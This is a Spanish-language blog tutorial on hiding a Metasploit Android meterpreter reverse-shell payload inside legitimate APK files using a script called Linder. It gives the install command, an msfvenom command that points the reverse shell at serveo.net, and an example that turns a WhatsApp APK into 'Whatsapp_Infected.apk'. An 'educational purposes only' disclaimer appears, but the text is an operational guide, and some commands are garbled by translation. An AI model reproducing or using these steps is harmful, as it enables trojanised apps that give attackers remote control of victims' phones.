Blog

Cómo: incrustar la carga útil de MSF en archivos APK originales | Parte # 2 – Usando Linder

R37r0_Gh057

¡Hola, mi compañero H4ck3Rs!

  • ¡Espero que todos estén bien! Hoy, estoy aquí para hacer una guía completamente nueva: Cómo incrustar la carga útil de MSF en archivos APK originales con Linder .

¿Qué es Linder … ???

  • Linder es todo un guión nuevo, escrito por mi amado Amigo; R37r0_Gh057 (Identificado por el personaje de Wrench). R37r0 combinó de manera inteligente todos los métodos básicos y avanzados para incrustar una carga útil en (casi) cualquier archivo APK en un simple script de Python. Este script también funciona en TermuX (Requisito para TermuX: APKMOD de Hax4Us, detalles completos aquí). Este script funciona principalmente en aplicaciones pequeñas como descargadores o aplicaciones Flash Light, etc. Las aplicaciones más grandes como juegos o software tienen problemas, como que la sesión no se muestra en MSFconsole, etc. Pero no significa que sea un error permanente. Simplemente mantenga actualizado su guión Linder. R37r0 intentará eliminar cualquier ERROR que haya encontrado (y si encuentra algún error, dígaselo en la página de GitHub, o comente aquí, él intentará resolverlo).
  • Puede consultar la Descripción de Linder a Página de GitHub de R37t0.

777-777-777-777-777-777-777-777-777-777-777-777-777-777-777-777
================================================ ===
DESCARGO DE RESPONSABILIDAD: Este hilo es ÚNICAMENTE para fines educativos.
No seré responsable de ningún uso ilegal o negativo de
esta informacion. Trate de no HACKEAR los Dispositivos, excepto
los tuyos, solo por conocimiento, O estarás en PRISIÓN. Uso único
esta información con fines de prueba / Jugar (con) tus amigos.
================================================ ===
777-777-777-777-777-777-777-777-777-777-777-777-777-777-777-777

Requisitos

1). Kali Environment / TermuX (última versión con entorno actualizado)
2). Active Internet (solo para la instalación. De lo contrario, Linder no requiere una conexión activa a Internet).
3). Metasploit: instalado (para generar Payload, si ya tiene uno, simplemente ignore este paso)

  • Entonces, comencemos a jugar con él;

Procedimiento (utilizando el entorno Kali LinuX)

Paso 1: instalación

  • En primer lugar, ejecute el siguiente comando. Esto creará un APK Carpeta en tu $ INICIO Directorio, dentro de esa carpeta, todos los componentes requeridos estarían presentes. Ahora, abra Terminal y ejecute este comando:

cd && mkdir APK && cd APK && sudo apt-get install wget curl python3 && wget github.com/R37r0-Gh057/Linder/blob/master/main.py && wget github.com/R37r0-Gh057/Linder/blob/master/release.keystore && mv main.py linder && chmod + x linder && chmod + x release.keystore

  • Ahora, como puede ver, se crea una carpeta APK y todos los archivos Linder se encuentran aquí.
  • VAMOS 2 EL SIGUIENTE ST3P:

Paso 2: Preparar las cosas para el paso siguiente

  • Bien, ahora lo único que tiene que hacer es copiar el archivo APK de carga útil a la carpeta APK. O, si aún no ha generado la carga útil, hágalo. Comando de muestra:

msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R> almacenamiento / descargas / Payload.apk

  • Ahora, el proceso de vinculación de la carga útil con el archivo APK original, ya está descrito por R37r0_Gh057 en su Página de GitHub. De todos modos, copiaré ese método aquí.
  • Primero, coloque el archivo PAYLOAD y APK (que se va a infectar) dentro de la carpeta APK (ya creada por el comando, donde se encuentran linder y keytrake).
  • Para el modo de interfaz, terminal abierto ALLÍy ejecute el siguiente comando:

python3 linder

  • Siga las instrucciones y su trabajo estará terminado.
  • Hay otra forma de hacerlo, que es el uso de la línea de comandos o CLI.
  • 4 esto, ejecute el siguiente comando con las modificaciones adecuadas:

Python3 linder path / to / payload.apk path / to / any / app.apk path / to / save / the / final / app / with / name.apk

  • Para encontrar la RUTA correcta, mientras está dentro de la carpeta APK, ingrese el comando: pwd , para comprobar la RUTA de ese directorio. Luego, reemplace las rutas anteriores: ruta / a / payload.apk , ruta / a / cualquier / app.apk Y ruta / a / guardar / la / final / aplicación / con / nombre.apk respectivamente.
  • Por ejemplo:

python3 linder /root/home/APK/somepayload.apk /root/home/Whatsapp.apk /root/home/Whatsapp_Infected.apk

  • Si lo siguió correctamente, el archivo infectado se creará en esa carpeta APK, o donde sea que establezca la ruta.
  • Si es así, entonces ¡FELICIDADES! Ha aprendido otro método para vincular la carga útil con otro archivo APK.

Nota:-

Este hilo se crea solo con fines educativos. No seré responsable de ningún uso ilegal de esta información.

Si tiene algún problema o recibe algún tipo de error o cree que me he perdido algo, infórmeme en la sección de comentarios. Lo arreglaré pronto …

De todos modos, gracias por leer mi hilo (también puedes unirte a nuestro (WhatsApp / Telegram) Grupos para obtener más información y guías.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar